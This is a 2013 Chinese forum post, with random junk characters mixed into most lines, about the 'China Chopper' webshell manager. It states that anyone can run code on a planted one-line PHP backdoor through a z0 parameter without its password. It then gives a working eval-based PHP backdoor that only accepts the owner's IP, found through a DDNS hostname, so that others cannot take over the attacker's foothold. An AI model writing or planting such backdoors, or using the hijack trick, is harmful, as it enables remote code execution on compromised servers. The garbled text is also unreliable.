今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
2 W' F0 b4 I% Q; t; v. A" a: e0 m+ |! ^0 ^0 D
就算你设置了密码,使用了eval($_REQUEST['moyo']);4 d* m; w/ z- C2 ^& m' s& Q
* J8 j4 t' [# P' ~# S n$ Z
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
: S; J3 `# n( G, c5 \6 Y
; b0 Z# M2 d3 M) ^" V4 r6 p因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
# y7 q1 d* P1 Z5 M F8 p$ n7 B2 S# r2 z$ }' _7 s
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了! n$ N, [ w6 P P, }& U4 i
. q* ]$ I& O) ]5 i% a7 s
不知道是设计缺陷还是故意留的后门
p: g" F% S& y, S6 y% Y- W8 u q. x5 o4 t U+ y
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用! I% E! I- K1 H, B8 V4 @) m! F. A6 o
1 T: Y2 W7 E5 _) Z本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org9 x$ D. M9 T" R5 a
" e) d$ n* z) e4 N7 U/ \
然后一句话后门这样写0 b- [3 d9 a! Y2 ]3 _" a
) R* J, Q' u2 @& e' ^+ K* h<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
D2 t! U9 |& I& u. ^这样就可以让一句话后门只允许自己的电脑连接了
2 @; {3 M4 H8 w9 q; E& n$ y! s: \* J% l/ S
|
发表于 2013-7-26 12:45:48
收藏
支持
反对